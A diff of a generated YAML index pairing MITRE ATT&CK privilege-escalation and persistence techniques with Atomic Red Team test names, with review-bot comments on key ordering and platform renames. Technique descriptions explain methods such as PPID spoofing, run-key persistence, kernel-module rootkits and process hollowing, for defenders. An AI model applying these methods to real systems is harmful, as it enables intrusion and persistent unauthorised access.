Explicitly assigning the PPID may also enable elevated privileges given appropriate access rights to the parent process. For example, an adversary in a privileged user context (i.e. administrator) may spawn a new process and assign the parent as a process running as SYSTEM (such as lsass.exe
), causing the new process to be elevated via the inherited access token.(Citation: XPNSec PPID Nov 2017)
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-05-03T02:15:42.360Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Access Token Manipulation: Parent PID Spoofing'
x_mitre_detection: |-
@@ -35304,7 +35627,6 @@ privilege-escalation:
- Host Forensic Analysis
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1134.004
atomic_tests:
- name: Parent PID Spoofing using PowerShell
@@ -35498,7 +35820,7 @@ privilege-escalation:
name: powershell
T1546.001:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-09-12T15:27:11.065Z'
name: 'Event Triggered Execution: Change Default File Association'
description: "Adversaries may establish persistence by executing malicious content
triggered by a file type association. When a file is opened, the default program
@@ -35524,7 +35846,6 @@ privilege-escalation:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: persistence
- x_mitre_attack_spec_version: 2.1.0
x_mitre_contributors:
- Travis Smith, Tripwire
- Stefan Kanthak
@@ -35538,7 +35859,6 @@ privilege-escalation:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.0'
@@ -35565,8 +35885,8 @@ privilege-escalation:
url: https://support.microsoft.com/en-us/help/18539/windows-7-change-default-programs
- source_name: Microsoft File Handlers
description: Microsoft. (n.d.). Specifying File Handlers for File Name Extensions.
- Retrieved November 13, 2014.
- url: http://msdn.microsoft.com/en-us/library/bb166549.aspx
+ Retrieved September 12, 2024.
+ url: https://learn.microsoft.com/en-us/previous-versions/visualstudio/visual-studio-2015/extensibility/specifying-file-handlers-for-file-name-extensions?view=vs-2015
- source_name: Microsoft Assoc Oct 2017
description: Plett, C. et al.. (2017, October 15). assoc. Retrieved August
7, 2018.
@@ -35577,7 +35897,8 @@ privilege-escalation:
url: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_fakeav.gzd
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1546.001
atomic_tests:
- name: Change Default File Association
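Review bot: key ordering is inconsistent between objects in the same generated file: for T1546.001 the x_mitre_attack_spec_version / x_mitre_modified_by_ref pair is removed near the top of the object and re-added after object_marking_refs, while for T1078.001 and T1098.001 the same pair is moved in the opposite direction, to just before x_mitre_contributors / x_mitre_platforms. A non-deterministic key order means the next regeneration will produce another large move-only diff; sorting the technique keys in the generator (or preserving the upstream order) would keep future diffs to real changes.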
@@ -35677,7 +35998,7 @@ privilege-escalation:
resources, and possibly elevated privileges. Execution via VDSO hijacking
may also evade detection from security products since the execution is masked
under a legitimate process. "
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-07-07T17:09:09.048Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: VDSO Hijacking
x_mitre_detection: "Monitor for malicious usage of system calls, such as ptrace
@@ -35704,7 +36025,6 @@ privilege-escalation:
- Application control
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1546.014:
technique:
@@ -35744,7 +36064,7 @@ privilege-escalation:
The rule files are in the plist format and define the name, event type, and action to take. Some examples of event types include system startup and user authentication. Examples of actions are to run a system command or send an email. The emond service will not launch if there is no file present in the QueueDirectories path /private/var/db/emondClients
, specified in the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) configuration file at/System/Library/LaunchDaemons/com.apple.emond.plist
.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019)
Adversaries may abuse this service by writing a rule to execute commands when a defined event occurs, such as system start up or user authentication.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019) Adversaries may also be able to escalate privileges from administrator to root as the emond service is executed with root privileges by the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) service.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T00:16:01.732Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Event Triggered Execution: Emond'
x_mitre_detection: Monitor emond rules creation by checking for files created
@@ -35764,12 +36084,11 @@ privilege-escalation:
- Administrator
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.014
atomic_tests: []
T1574.010:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:37.026Z'
name: Services File Permissions Weakness
description: |-
Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
@@ -35823,11 +36142,10 @@ privilege-escalation:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
atomic_tests: []
T1547.001:
technique:
- modified: '2023-10-16T09:08:22.319Z'
+ modified: '2024-09-12T15:27:58.051Z'
name: 'Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder'
description: |-
Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.(Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level.
@@ -35914,9 +36232,9 @@ privilege-escalation:
in the Registry. Retrieved August 3, 2020.
url: https://docs.microsoft.com/en-us/windows/win32/sysinfo/32-bit-and-64-bit-application-data-in-the-registry
- source_name: Microsoft Run Key
- description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November
- 12, 2014.
- url: http://msdn.microsoft.com/en-us/library/aa376977
+ description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved September
+ 12, 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys
- source_name: Oddvar Moe RunOnceEx Mar 2018
description: Moe, O. (2018, March 21). Persistence using RunOnceEx - Hidden
from Autoruns.exe. Retrieved June 29, 2018.
@@ -35929,7 +36247,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.001
atomic_tests:
- name: Reg Key Run
@@ -36363,7 +36680,7 @@ privilege-escalation:
elevation_required: true
T1098:
technique:
- modified: '2024-01-16T22:24:38.234Z'
+ modified: '2024-10-15T15:35:57.382Z'
name: Account Manipulation
description: "Adversaries may manipulate accounts to maintain and/or elevate
access to victim systems. Account manipulation may consist of any action that
@@ -36399,16 +36716,15 @@ privilege-escalation:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- IaaS
- Linux
- macOS
- - Google Workspace
- SaaS
- Network
- Containers
- x_mitre_version: '2.6'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.7'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Process: Process Creation'
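Review bot: the T1098 platform list drops Azure AD, Office 365 and Google Workspace and adds Office Suite and Identity Provider (x_mitre_version 2.6 to 2.7). Any index generation or filtering keyed on the old platform names, such as per-platform index files, needs the same rename in this change set, otherwise techniques carrying the new names will silently fall out of those indexes.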
@@ -36449,7 +36765,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1098
atomic_tests:
- name: Admin Account Manipulate
@@ -36944,138 +37259,137 @@ privilege-escalation:
commands first\"\n}\n"
T1547.006:
technique:
- x_mitre_platforms:
- - macOS
- - Linux
- x_mitre_domains:
- - enterprise-attack
+ modified: '2024-09-12T17:30:54.170Z'
+ name: 'Boot or Logon Autostart Execution: Kernel Modules and Extensions'
+ description: |-
+ Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.(Citation: Linux Kernel Programming)
+
+ When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0).(Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors, and enabling root access to non-privileged users.(Citation: iDefense Rootkit Overview)
+
+ Kernel extensions, also called kext, are used in macOS to load functionality onto a system similar to LKMs for Linux. Since the kernel is responsible for enforcing security and the kernel extensions run as apart of the kernel, kexts are not governed by macOS security policies. Kexts are loaded and unloaded through kextload
and kextunload
commands. Kexts need to be signed with a developer ID that is granted privileges by Apple allowing it to sign Kernel extensions. Developers without these privileges may still sign kexts but they will not load unless SIP is disabled. If SIP is enabled, the kext signature is verified before being added to the AuxKC.(Citation: System and kernel extensions in macOS)
+
+ Since macOS Catalina 10.15, kernel extensions have been deprecated in favor of System Extensions. However, kexts are still allowed as "Legacy System Extensions" since there is no System Extension for Kernel Programming Interfaces.(Citation: Apple Kernel Extension Deprecation)
+
+ Adversaries can use LKMs and kexts to conduct [Persistence](https://attack.mitre.org/tactics/TA0003) and/or [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) on a system. Examples have been found in the wild, and there are some relevant open source projects as well.(Citation: Volatility Phalanx2)(Citation: CrowdStrike Linux Rootkit)(Citation: GitHub Reptile)(Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle)(Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir)(Citation: Trend Micro Skidmap)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
x_mitre_contributors:
- Wayne Silva, F-Secure Countercept
- Anastasios Pingios
- Jeremy Galloway
- Red Canary
- Eric Kaiser @ideologysec
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_deprecated: false
+ x_mitre_detection: |
+ Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands: modprobe
, insmod
, lsmod
, rmmod
, or modinfo
(Citation: Linux Loadable Kernel Module Insert and Remove LKMs) LKMs are typically loaded into /lib/modules
and have had the extension .ko ("kernel object") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module)
+
+ Adversaries may run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Adversaries may also execute commands to identify the exact version of the running Linux kernel and/or download multiple versions of the same .ko (kernel object) files to use the one appropriate for the running system.(Citation: Trend Micro Skidmap) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly. These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: apt-get install linux-headers-$(uname -r)
On RHEL and CentOS based systems this can be accomplished by running: yum install kernel-devel-$(uname -r)
+
+ On macOS, monitor for execution of kextload
commands and user installed kernel extensions performing abnormal and/or potentially malicious activity (such as creating network connections). Monitor for new rows added in the kext_policy
table. KextPolicy stores a list of user approved (non Apple) kernel extensions and a partial history of loaded kernel modules in a SQLite database, /var/db/SystemPolicyConfiguration/KextPolicy
.(Citation: User Approved Kernel Extension Pike’s)(Citation: Purves Kextpocalypse 2)(Citation: Apple Developer Configuration Profile)
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - macOS
+ - Linux
+ x_mitre_version: '1.3'
+ x_mitre_data_sources:
+ - 'Command: Command Execution'
+ - 'File: File Creation'
+ - 'File: File Modification'
+ - 'Kernel: Kernel Module Load'
+ - 'Process: Process Creation'
+ x_mitre_permissions_required:
+ - root
type: attack-pattern
id: attack-pattern--a1b52199-c8c5-438a-9ded-656f1d0888c6
created: '2020-01-24T17:42:23.339Z'
- x_mitre_version: '1.3'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1547.006
url: https://attack.mitre.org/techniques/T1547/006
+ external_id: T1547.006
- source_name: Apple Developer Configuration Profile
- url: https://developer.apple.com/business/documentation/Configuration-Profile-Reference.pdf
description: Apple. (2019, May 3). Configuration Profile Reference. Retrieved
September 23, 2021.
+ url: https://developer.apple.com/business/documentation/Configuration-Profile-Reference.pdf
- source_name: Apple Kernel Extension Deprecation
- url: https://developer.apple.com/support/kernel-extensions/
description: Apple. (n.d.). Deprecated Kernel Extensions and System Extension
Alternatives. Retrieved November 4, 2020.
+ url: https://developer.apple.com/support/kernel-extensions/
- source_name: System and kernel extensions in macOS
- url: https://support.apple.com/guide/deployment/system-and-kernel-extensions-in-macos-depa5fb8376f/web
description: Apple. (n.d.). System and kernel extensions in macOS. Retrieved
March 31, 2022.
+ url: https://support.apple.com/guide/deployment/system-and-kernel-extensions-in-macos-depa5fb8376f/web
- source_name: GitHub Reptile
- url: https://github.com/f0rb1dd3n/Reptile
description: Augusto, I. (2018, March 8). Reptile - LMK Linux rootkit. Retrieved
April 9, 2018.
+ url: https://github.com/f0rb1dd3n/Reptile
- source_name: Volatility Phalanx2
- url: https://volatility-labs.blogspot.com/2012/10/phalanx-2-revealed-using-volatility-to.html
description: 'Case, A. (2012, October 10). Phalanx 2 Revealed: Using Volatility
to Analyze an Advanced Linux Rootkit. Retrieved April 9, 2018.'
+ url: https://volatility-labs.blogspot.com/2012/10/phalanx-2-revealed-using-volatility-to.html
- source_name: iDefense Rootkit Overview
- url: http://www.megasecurity.org/papers/Rootkits.pdf
description: Chuvakin, A. (2003, February). An Overview of Rootkits. Retrieved
- April 6, 2018.
+ September 12, 2024.
+ url: https://www.megasecurity.org/papers/Rootkits.pdf
- source_name: Linux Loadable Kernel Module Insert and Remove LKMs
- url: http://tldp.org/HOWTO/Module-HOWTO/x197.html
description: Henderson, B. (2006, September 24). How To Insert And Remove
LKMs. Retrieved April 9, 2018.
+ url: http://tldp.org/HOWTO/Module-HOWTO/x197.html
- source_name: CrowdStrike Linux Rootkit
- url: https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/
description: Kurtz, G. (2012, November 19). HTTP iframe Injecting Linux Rootkit.
Retrieved December 21, 2017.
+ url: https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/
- source_name: GitHub Diamorphine
- url: https://github.com/m0nad/Diamorphine
description: Mello, V. (2018, March 8). Diamorphine - LMK rootkit for Linux
Kernels 2.6.x/3.x/4.x (x86 and x86_64). Retrieved April 9, 2018.
+ url: https://github.com/m0nad/Diamorphine
- source_name: Securelist Ventir
- url: https://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/
description: 'Mikhail, K. (2014, October 16). The Ventir Trojan: assemble
your MacOS spy. Retrieved April 6, 2018.'
+ url: https://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/
- source_name: User Approved Kernel Extension Pike’s
- url: https://pikeralpha.wordpress.com/2017/08/29/user-approved-kernel-extension-loading/
description: Pikeralpha. (2017, August 29). User Approved Kernel Extension
Loading…. Retrieved September 23, 2021.
+ url: https://pikeralpha.wordpress.com/2017/08/29/user-approved-kernel-extension-loading/
- source_name: Linux Kernel Module Programming Guide
- url: http://www.tldp.org/LDP/lkmpg/2.4/html/x437.html
description: Pomerantz, O., Salzman, P. (2003, April 4). Modules vs Programs.
Retrieved April 6, 2018.
+ url: http://www.tldp.org/LDP/lkmpg/2.4/html/x437.html
- source_name: Linux Kernel Programming
- url: https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf
description: Pomerantz, O., Salzman, P.. (2003, April 4). The Linux Kernel
Module Programming Guide. Retrieved April 6, 2018.
+ url: https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf
- source_name: Trend Micro Skidmap
- url: https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/
description: Remillano, A., Urbanec, J. (2019, September 19). Skidmap Linux
Malware Uses Rootkit Capabilities to Hide Cryptocurrency-Mining Payload.
Retrieved June 4, 2020.
+ url: https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/
- source_name: Purves Kextpocalypse 2
- url: https://richard-purves.com/2017/11/09/mdm-and-the-kextpocalypse-2/
description: Richard Purves. (2017, November 9). MDM and the Kextpocalypse
. Retrieved September 23, 2021.
+ url: https://richard-purves.com/2017/11/09/mdm-and-the-kextpocalypse-2/
- source_name: RSAC 2015 San Francisco Patrick Wardle
- url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
description: Wardle, P. (2015, April). Malware Persistence on OS X Yosemite.
Retrieved April 6, 2018.
+ url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
- source_name: Synack Secure Kernel Extension Broken
- url: https://www.synack.com/2017/09/08/high-sierras-secure-kernel-extension-loading-is-broken/
description: Wardle, P. (2017, September 8). High Sierra’s ‘Secure Kernel
Extension Loading’ is Broken. Retrieved April 6, 2018.
+ url: https://www.synack.com/2017/09/08/high-sierras-secure-kernel-extension-loading-is-broken/
- source_name: Wikipedia Loadable Kernel Module
- url: https://en.wikipedia.org/wiki/Loadable_kernel_module#Linux
description: Wikipedia. (2018, March 17). Loadable kernel module. Retrieved
April 9, 2018.
- x_mitre_deprecated: false
- revoked: false
- description: |-
- Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.(Citation: Linux Kernel Programming)
-
- When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0).(Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors, and enabling root access to non-privileged users.(Citation: iDefense Rootkit Overview)
-
- Kernel extensions, also called kext, are used in macOS to load functionality onto a system similar to LKMs for Linux. Since the kernel is responsible for enforcing security and the kernel extensions run as apart of the kernel, kexts are not governed by macOS security policies. Kexts are loaded and unloaded through kextload
and kextunload
commands. Kexts need to be signed with a developer ID that is granted privileges by Apple allowing it to sign Kernel extensions. Developers without these privileges may still sign kexts but they will not load unless SIP is disabled. If SIP is enabled, the kext signature is verified before being added to the AuxKC.(Citation: System and kernel extensions in macOS)
-
- Since macOS Catalina 10.15, kernel extensions have been deprecated in favor of System Extensions. However, kexts are still allowed as "Legacy System Extensions" since there is no System Extension for Kernel Programming Interfaces.(Citation: Apple Kernel Extension Deprecation)
-
- Adversaries can use LKMs and kexts to conduct [Persistence](https://attack.mitre.org/tactics/TA0003) and/or [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) on a system. Examples have been found in the wild, and there are some relevant open source projects as well.(Citation: Volatility Phalanx2)(Citation: CrowdStrike Linux Rootkit)(Citation: GitHub Reptile)(Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle)(Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir)(Citation: Trend Micro Skidmap)
- modified: '2022-05-11T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: 'Boot or Logon Autostart Execution: Kernel Modules and Extensions'
- x_mitre_detection: |
- Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands: modprobe
, insmod
, lsmod
, rmmod
, or modinfo
(Citation: Linux Loadable Kernel Module Insert and Remove LKMs) LKMs are typically loaded into /lib/modules
and have had the extension .ko ("kernel object") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module)
-
- Adversaries may run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Adversaries may also execute commands to identify the exact version of the running Linux kernel and/or download multiple versions of the same .ko (kernel object) files to use the one appropriate for the running system.(Citation: Trend Micro Skidmap) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly. These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: apt-get install linux-headers-$(uname -r)
On RHEL and CentOS based systems this can be accomplished by running: yum install kernel-devel-$(uname -r)
-
- On macOS, monitor for execution of kextload
commands and user installed kernel extensions performing abnormal and/or potentially malicious activity (such as creating network connections). Monitor for new rows added in the kext_policy
table. KextPolicy stores a list of user approved (non Apple) kernel extensions and a partial history of loaded kernel modules in a SQLite database, /var/db/SystemPolicyConfiguration/KextPolicy
.(Citation: User Approved Kernel Extension Pike’s)(Citation: Purves Kextpocalypse 2)(Citation: Apple Developer Configuration Profile)
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: persistence
- - kill_chain_name: mitre-attack
- phase_name: privilege-escalation
- x_mitre_is_subtechnique: true
- x_mitre_data_sources:
- - 'Command: Command Execution'
- - 'File: File Creation'
- - 'File: File Modification'
- - 'Kernel: Kernel Module Load'
- - 'Process: Process Creation'
- x_mitre_permissions_required:
- - root
- x_mitre_attack_spec_version: 2.1.0
+ url: https://en.wikipedia.org/wiki/Loadable_kernel_module#Linux
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.006
atomic_tests:
- name: Snake Malware Kernel Driver Comadmin
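Review bot: almost all of this 138-line hunk is key reordering rather than content change: the description, detection text, kill chain phases, data sources and permissions for T1547.006 are byte-identical and merely moved, and within every external reference the url key is moved from before to after description. The substantive edits are the modified stamp, x_mitre_attack_spec_version 2.1.0 to 3.2.0, the added created_by_ref and revoked keys, and the iDefense Rootkit URL switching to https with a new retrieval date. Emitting keys in a stable order in the generator (source order or sorted) would keep future regenerations reviewable.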
@@ -37138,7 +37452,7 @@ privilege-escalation:
url: https://docs.microsoft.com/en-us/windows/win32/api/winternl/nf-winternl-ntqueryinformationprocess
description: Microsoft. (2021, November 23). NtQueryInformationProcess function
(winternl.h). Retrieved February 4, 2022.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-22T15:47:33.915Z'
name: KernelCallbackTable
description: |-
Adversaries may abuse the KernelCallbackTable
of a process to hijack its execution flow in order to run their own payloads.(Citation: Lazarus APT January 2022)(Citation: FinFisher exposed ) The KernelCallbackTable
can be found in the Process Environment Block (PEB) and is initialized to an array of graphic functions available to a GUI process once user32.dll
is loaded.(Citation: Windows Process Injection KernelCallbackTable)
@@ -37164,12 +37478,10 @@ privilege-escalation:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Process: OS API Execution'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1053.006:
technique:
- modified: '2023-09-08T11:56:26.862Z'
+ modified: '2024-10-15T16:42:51.536Z'
name: 'Scheduled Task/Job: Systemd Timers'
description: |-
Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension .timer
that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to [Cron](https://attack.mitre.org/techniques/T1053/003) in Linux environments.(Citation: archlinux Systemd Timers Aug 2020) Systemd timers may be activated remotely via the systemctl
command line utility, which operates over [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: Systemd Remote Control)
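Review bot: for KernelCallbackTable both spec_version and x_mitre_attack_spec_version: 2.1.0 are removed with no replacement visible in this hunk, whereas every other technique in the patch keeps or bumps x_mitre_attack_spec_version (T1053.006 goes 3.1.0 to 3.2.0 in the next hunk). Check the rest of that object to confirm the key was relocated rather than dropped.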
@@ -37247,9 +37559,8 @@ privilege-escalation:
url: http://man7.org/linux/man-pages/man1/systemd.1.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.006
atomic_tests: []
T1574:
@@ -37316,7 +37627,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1543.005:
technique:
@@ -37390,11 +37700,10 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1078:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:09:46.024Z'
name: Valid Accounts
description: |-
Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.(Citation: volexity_0day_sophos_FW) Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
@@ -37411,7 +37720,6 @@ privilege-escalation:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
- x_mitre_attack_spec_version: 3.1.0
x_mitre_contributors:
- Syed Ummar Farooqh, McAfee
- Prasad Somasamudram, McAfee
@@ -37421,7 +37729,7 @@ privilege-escalation:
- Netskope
- Mark Wee
- Praetorian
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: |-
Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
@@ -37430,19 +37738,17 @@ privilege-escalation:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '2.6'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.7'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'User Account: User Account Authentication'
@@ -37490,11 +37796,12 @@ privilege-escalation:
url: https://technet.microsoft.com/en-us/library/dn487457.aspx
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1055.012:
technique:
- modified: '2023-08-11T21:37:00.009Z'
+ modified: '2024-09-12T15:11:45.602Z'
name: 'Process Injection: Process Hollowing'
description: "Adversaries may inject malicious code into suspended and hollowed
processes in order to evade process-based defenses. Process hollowing is a
@@ -37562,18 +37869,17 @@ privilege-escalation:
Retrieved December 7, 2017.'
url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
- source_name: Leitch Hollowing
- description: Leitch, J. (n.d.). Process Hollowing. Retrieved November 12,
- 2014.
- url: http://www.autosectools.com/process-hollowing.pdf
+ description: Leitch, J. (n.d.). Process Hollowing. Retrieved September 12,
+ 2024.
+ url: https://new.dc414.org/wp-content/uploads/2011/01/Process-Hollowing.pdf
- source_name: Mandiant Endpoint Evading 2019
description: 'Pena, E., Erikson, C. (2019, October 10). Staying Hidden on
the Endpoint: Evading Detection with Shellcode. Retrieved November 29, 2021.'
url: https://www.mandiant.com/resources/staying-hidden-on-the-endpoint-evading-detection-with-shellcode
object_marking_refs:
